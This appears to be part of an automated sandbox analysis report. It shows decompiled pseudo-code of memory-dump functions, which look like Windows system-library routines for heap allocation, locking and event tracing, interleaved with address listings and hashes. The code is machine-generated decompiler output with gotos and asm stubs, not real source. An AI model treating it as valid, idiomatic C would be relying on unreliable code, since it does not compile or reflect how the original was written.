                                      0x00000000
                                      0x00000000
                                      0x036fe7cc
                                      0x036fe7d9
                                      0x036fe7dc
                                      0x036fe7de
                                      0x036fe7de
                                      0x036fe7ac
                                      0x036fe7e4
                                      0x036fe74b
                                      0x036fe751
                                      0x036fe759
                                      0x036fe761
                                      0x036fe761

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 086ff0bca20048684388eb14a16797986562629b4f335ca48d4ffbd4446856d1
                                      • Instruction ID: 5d5459ecb7c93fad029b46912d83d6388aa012905f66465461d67adcab9aea84
                                      • Opcode Fuzzy Hash: 086ff0bca20048684388eb14a16797986562629b4f335ca48d4ffbd4446856d1
                                      • Instruction Fuzzy Hash: 60318D75A14249EFD704DF68C845F9ABBE8FB09310F148256FA14CB351E632E990CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036FBC2C, Relevance: .1, Instructions: 88COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 67%
                                      			E036FBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x37b6100; // 0x11
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E036E2280(0xd, 0x1168f1a0);
				_t41 =  *0x37b60f8; // 0x0
				if(_t41 != 0) {
					 *0x37b60f8 =  *_t41;
					 *0x37b60fc =  *0x37b60fc + 0xffff;
				}
				E036DFFB0(_t41, 0x800, 0x1168f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x37b60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L036E4620(0x37b6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x37b6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                      0x036fbc36
                                      0x036fbc42
                                      0x036fbc45
                                      0x036fbc4a
                                      0x036fbd35
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036fbc50
                                      0x036fbc50
                                      0x036fbc58
                                      0x036fbc5a
                                      0x036fbc60
                                      0x00000000
                                      0x00000000
                                      0x0373a4f2
                                      0x0373a4f6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0373a4fc
                                      0x036fbc79
                                      0x036fbc7e
                                      0x036fbc86
                                      0x036fbd16
                                      0x036fbd20
                                      0x036fbd20
                                      0x036fbc8d
                                      0x036fbc94
                                      0x036fbcbd
                                      0x036fbcca
                                      0x036fbccb
                                      0x036fbccc
                                      0x036fbccd
                                      0x036fbcce
                                      0x036fbcd4
                                      0x036fbcea
                                      0x036fbcee
                                      0x036fbcf2
                                      0x036fbd00
                                      0x036fbd04
                                      0x00000000
                                      0x036fbc96
                                      0x036fbcab
                                      0x036fbcaf
                                      0x036fbd2c
                                      0x036fbd2c
                                      0x036fbd09
                                      0x00000000
                                      0x036fbd09
                                      0x036fbcb1
                                      0x036fbcb5
                                      0x036fbcbb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036fbcbb

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a5ab298257c5f3ef61b1efa6879675d71b76c257c5d16f94addbbd1690d6b265
                                      • Instruction ID: 1421f7b9663fbbdca919a7411fdbb580163d7bd60b499280972d1345ee16a3f3
                                      • Opcode Fuzzy Hash: a5ab298257c5f3ef61b1efa6879675d71b76c257c5d16f94addbbd1690d6b265
                                      • Instruction Fuzzy Hash: CF31EE36A006199FCB11EF58C4C0BA673B8EF19310F188079EE45DF205EB78D9068B84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036C9100, Relevance: .1, Instructions: 87COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 76%
                                      			E036C9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x379f6e8);
				E0371D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E037988F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0371D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x37b86c0; // 0x2e807b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x37b86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E036E2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E037988F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0370AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x37bb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x37b84c0;
										if(_t69 >=  *0x37b84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E03799063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E036C922A(_t82);
							_t53 = E036E7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E03798B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x37b86c0; // 0x2e807b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x37b86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x37b86bc;
										_t72 = 0x37b86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E036C9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x37b86c4;
									_t72 = 0x37b86c0;
									L18:
									E036F9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                      0x036c9100
                                      0x036c9100
                                      0x036c9100
                                      0x036c9100
                                      0x036c9102
                                      0x036c9107
                                      0x036c910c
                                      0x036c9110
                                      0x036c9115
                                      0x036c9136
                                      0x036c9143
                                      0x037237e4
                                      0x037237e4
                                      0x036c9149
                                      0x036c914e
                                      0x036c914e
                                      0x036c9117
                                      0x036c911d
                                      0x00000000
                                      0x00000000
                                      0x036c911f
                                      0x036c9125
                                      0x00000000
                                      0x036c9151
                                      0x036c9158
                                      0x036c915d
                                      0x036c9161
                                      0x036c9168
                                      0x03723715
                                      0x00000000
                                      0x036c916e
                                      0x036c916e
                                      0x036c9175
                                      0x036c9177
                                      0x036c917e
                                      0x036c917f
                                      0x036c9182
                                      0x036c9182
                                      0x036c9187
                                      0x036c9187
                                      0x036c918a
                                      0x036c918d
                                      0x036c918f
                                      0x036c9192
                                      0x036c9195
                                      0x036c9198
                                      0x036c9198
                                      0x036c9198
                                      0x036c919a
                                      0x00000000
                                      0x00000000
                                      0x0372371f
                                      0x03723721
                                      0x03723727
                                      0x0372372f
                                      0x03723733
                                      0x03723735
                                      0x03723738
                                      0x0372373b
                                      0x0372373d
                                      0x03723740
                                      0x00000000
                                      0x00000000
                                      0x03723746
                                      0x03723749
                                      0x00000000
                                      0x00000000
                                      0x0372374f
                                      0x03723751
                                      0x00000000
                                      0x00000000
                                      0x03723757
                                      0x03723759
                                      0x0372375c
                                      0x0372375c
                                      0x0372375e
                                      0x0372375e
                                      0x03723761
                                      0x03723764
                                      0x00000000
                                      0x00000000
                                      0x03723766
                                      0x03723768
                                      0x037237a3
                                      0x037237a3
                                      0x037237a5
                                      0x037237a7
                                      0x037237ad
                                      0x037237b0
                                      0x037237b2
                                      0x037237bc
                                      0x037237c2
                                      0x037237c2
                                      0x037237b2
                                      0x036c9187
                                      0x036c9187
                                      0x036c918a
                                      0x036c918d
                                      0x036c918f
                                      0x036c9192
                                      0x036c9195
                                      0x00000000
                                      0x036c9195
                                      0x00000000
                                      0x036c9187
                                      0x0372376a
                                      0x0372376a
                                      0x0372376c
                                      0x0372376c
                                      0x0372376f
                                      0x03723775
                                      0x00000000
                                      0x00000000
                                      0x03723777
                                      0x03723779
                                      0x00000000
                                      0x00000000
                                      0x03723782
                                      0x03723787
                                      0x03723789
                                      0x03723790
                                      0x03723790
                                      0x0372378b
                                      0x0372378b
                                      0x0372378b
                                      0x03723792
                                      0x03723795
                                      0x03723795
                                      0x03723798
                                      0x03723798
                                      0x0372379b
                                      0x0372379b
                                      0x036c91a3
                                      0x036c91a9
                                      0x036c91b0
                                      0x036c91b4
                                      0x036c91b4
                                      0x036c91bb
                                      0x036c91c0
                                      0x036c91c5
                                      0x036c91c7
                                      0x037237da
                                      0x036c91cd
                                      0x036c91cd
                                      0x036c91cd
                                      0x036c91d2
                                      0x036c91d5
                                      0x036c9239
                                      0x036c9239
                                      0x036c91d7
                                      0x036c91db
                                      0x036c91e1
                                      0x036c91e7
                                      0x036c91fd
                                      0x036c9203
                                      0x036c921e
                                      0x036c9223
                                      0x00000000
                                      0x036c9223
                                      0x036c9205
                                      0x036c9208
                                      0x036c920c
                                      0x036c9214
                                      0x036c9214
                                      0x036c91e9
                                      0x036c91e9
                                      0x036c91ee
                                      0x036c91f3
                                      0x036c91f3
                                      0x036c91f3
                                      0x036c91e7
                                      0x00000000
                                      0x036c91db
                                      0x036c9187
                                      0x036c9168

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 980962f815f0580c4c357996bedbc2867f537d3b56fa7f9e5965b34847cecb6d
                                      • Instruction ID: b669e462b5289f4048e6db4dde2e3e0e498d8574d39aae7db7890e35a5767e54
                                      • Opcode Fuzzy Hash: 980962f815f0580c4c357996bedbc2867f537d3b56fa7f9e5965b34847cecb6d
                                      • Instruction Fuzzy Hash: 6A31A079A216C9EFDB25DB68C189BBCBBF5FB49314F18819EC4046B741C334A980CB56
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F1DB5, Relevance: .1, Instructions: 87COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 60%
                                      			E036F1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E036EF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L036E4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E036EF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                      0x036f1dc2
                                      0x036f1dc5
                                      0x036f1dc7
                                      0x036f1dcc
                                      0x036f1dce
                                      0x036f1dd6
                                      0x036f1ddf
                                      0x036f1de0
                                      0x036f1de1
                                      0x036f1de5
                                      0x036f1de8
                                      0x036f1def
                                      0x036f1df0
                                      0x036f1df6
                                      0x036f1df7
                                      0x036f1dfe
                                      0x036f1e1a
                                      0x00000000
                                      0x00000000
                                      0x036f1e0b
                                      0x036f1e12
                                      0x036f1e12
                                      0x036f1e00
                                      0x036f1e00
                                      0x036f1e05
                                      0x036f1e1e
                                      0x036f1e23
                                      0x0373570f
                                      0x03735713
                                      0x00000000
                                      0x00000000
                                      0x03735719
                                      0x03735719
                                      0x036f1e2c
                                      0x036f1e2d
                                      0x036f1e2e
                                      0x036f1e2f
                                      0x036f1e31
                                      0x036f1e32
                                      0x036f1e35
                                      0x036f1e3d
                                      0x03735723
                                      0x0373573d
                                      0x0373573d
                                      0x00000000
                                      0x03735723
                                      0x036f1e49
                                      0x036f1e4e
                                      0x036f1e4e
                                      0x036f1e09
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                      • Instruction ID: e0203972a7a26522d84b1a3c8776f9dd60a82088330a7512d8e1051712224040
                                      • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                      • Instruction Fuzzy Hash: 9521C436600219FFC721CF59CD80EABFBBDEF86694F154059FA019B210DA30AE01CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036E0050, Relevance: .1, Instructions: 81COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 53%
                                      			E036E0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x37bd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E036F9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0370B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E03798A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E036F9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x37bb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                      0x036e0055
                                      0x036e005d
                                      0x036e0062
                                      0x036e006c
                                      0x036e006f
                                      0x036e0074
                                      0x036e007a
                                      0x036e007a
                                      0x036e0080
                                      0x036e0080
                                      0x036e0087
                                      0x036e008d
                                      0x036e008f
                                      0x036e0093
                                      0x036e0095
                                      0x036e009b
                                      0x036e00f8
                                      0x036e00fb
                                      0x036e00fc
                                      0x036e00ff
                                      0x036e0108
                                      0x036e0108
                                      0x036e00a2
                                      0x036e00a6
                                      0x036e00b3
                                      0x036e00bc
                                      0x036e00c5
                                      0x036e00ca
                                      0x0372c01e
                                      0x00000000
                                      0x00000000
                                      0x0372c02d
                                      0x036e00d5
                                      0x036e00d9
                                      0x0372c03d
                                      0x0372c046
                                      0x0372c046
                                      0x036e00df
                                      0x036e00e2
                                      0x036e00ea
                                      0x036e00ef
                                      0x036e00f2
                                      0x036e00f6
                                      0x036e0111
                                      0x036e0117
                                      0x036e0117
                                      0x00000000
                                      0x036e00f6
                                      0x036e00d0
                                      0x036e00d0
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6d2c65d17285518dcddf31a4ac2c0f999b6f37878c68c83a02ef9659c4b51938
                                      • Instruction ID: afe7de4ca4f9be0926fdfe8ddd98835897a25239d92fa78de0da146142ea901f
                                      • Opcode Fuzzy Hash: 6d2c65d17285518dcddf31a4ac2c0f999b6f37878c68c83a02ef9659c4b51938
                                      • Instruction Fuzzy Hash: 4531CE31202B04CFD722CF28C944B9AB7E5FF88714F18856DE5968BB90EB75A805CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03746C0A, Relevance: .1, Instructions: 79COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 77%
                                      			E03746C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E036E7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x37b7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L036E4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0370F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E036E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03709AE0();
						_t23 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                      0x03746c0a
                                      0x03746c0f
                                      0x03746c10
                                      0x03746c13
                                      0x03746c15
                                      0x03746c19
                                      0x03746c1c
                                      0x03746c21
                                      0x03746c28
                                      0x03746c3a
                                      0x03746c2a
                                      0x03746c33
                                      0x03746c33
                                      0x03746c3f
                                      0x03746c48
                                      0x03746c4d
                                      0x03746c60
                                      0x03746c65
                                      0x03746c69
                                      0x03746c73
                                      0x03746c79
                                      0x03746c7f
                                      0x03746c86
                                      0x03746c90
                                      0x03746c94
                                      0x03746ca6
                                      0x03746cb2
                                      0x03746cbd
                                      0x03746cbd
                                      0x03746cc3
                                      0x03746cc7
                                      0x03746ccb
                                      0x03746cd0
                                      0x03746cd1
                                      0x03746ce2
                                      0x03746ce2
                                      0x03746c69
                                      0x03746ced

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e9f76a72b70f15371f0d83576a5be3a411c18ba7bd302bc9e2aa71ec69aa1ab0
                                      • Instruction ID: 8e35ce823def4a9dcdd0e87c35a2a2727c1f8b36da2bc976b233bdbd358931e9
                                      • Opcode Fuzzy Hash: e9f76a72b70f15371f0d83576a5be3a411c18ba7bd302bc9e2aa71ec69aa1ab0
                                      • Instruction Fuzzy Hash: 2C219AB5A00644ABC715DB68D880F2AB7F8FF49700F144069F904DB791D734E950CBA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037090AF, Relevance: .1, Instructions: 76COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E037090AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0371D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E036FE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L036E4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0370F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E036FA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                      0x037090af
                                      0x037090b8
                                      0x037090bb
                                      0x037090bf
                                      0x037090c2
                                      0x037090c2
                                      0x037090c8
                                      0x037090cb
                                      0x037090cd
                                      0x037414d7
                                      0x037414eb
                                      0x037414eb
                                      0x00000000
                                      0x037414eb
                                      0x037414db
                                      0x037414e6
